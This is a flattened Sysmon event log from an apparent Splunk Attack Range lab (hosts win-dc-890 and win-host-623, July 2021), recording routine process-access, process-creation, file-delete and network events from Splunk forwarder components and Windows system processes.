07:52:52.293{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:52.277{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.277{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.277{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F4D4-60EB-3C7D-00000000CF01}8952C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.277{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D4-60EB-3C7D-00000000CF01}8952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.278{466BC892-F4D4-60EB-3C7D-00000000CF01}8952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.146{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D522D3B9DCC7574B50B77C0C27698FA8,SHA256=53CA59B3A66BCA8DA77246A0977D06B2F3EDB0494B0D4732BD925F86E680BB1C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.777{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51031-false10.0.1.12-8000- 23542300x8000000000000000807673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:53.772{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94C79FA223AF9B0AF19A6CA8CDCADE71,SHA256=835F2D698CA198418F6AAF4A9D10B2141685400A6FDDDD711D23F36B3813ADCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.991{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C055B9A2DB7D2F847C3B5907B0055666,SHA256=44C73E40B9400831B9F478547574750D7B45049C8285CA48FB9A4FD790E8CC5C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.891{466BC892-F4D5-60EB-3E7D-00000000CF01}42568028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.691{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D5-60EB-3E7D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:53.676{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:53.676{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F4D5-60EB-3E7D-00000000CF01}4256C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D5-60EB-3E7D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.676{466BC892-F4D5-60EB-3E7D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:53.161{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=708C99A19525AE00AB829C31DDC9C8BA,SHA256=BDE09E9FA7B4C2F9C041081261DF76EB52AE9AC7E72D553DDC65B9782468300A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:54.775{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ACB97BA82BAE42FD3A20B131DB40868,SHA256=8475B9FA129F2D7322B960A2C91B0C8DCD13ABFBE8A08F6DD7DBB0D613D56C24,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D6-60EB-3F7D-00000000CF01}7864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:54.375{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.375{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F4D6-60EB-3F7D-00000000CF01}7864C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.360{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D6-60EB-3F7D-00000000CF01}7864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.361{466BC892-F4D6-60EB-3F7D-00000000CF01}7864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:54.164{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F189BB245F1577D0805DAE64A59AD7,SHA256=B8E56831B122236990BC3864F09AE06DFCC3611A930C92EDA448F6FED31554BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:55.791{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DEA6226BF8216767D2FCA350213A262,SHA256=40257ED103874028B472FC69C63B782AE7E796A74779ABB5E8850CCA0C4B8CC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.363{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DBB59084EA66160E6B33EBA7B11058DE,SHA256=FDC1CECACF33C4AF2F89C147B48FC217BF72C5CE49A1A3AD31459D54635965A5,IMPHASH=00000000000000000000000000000000falsetrue 
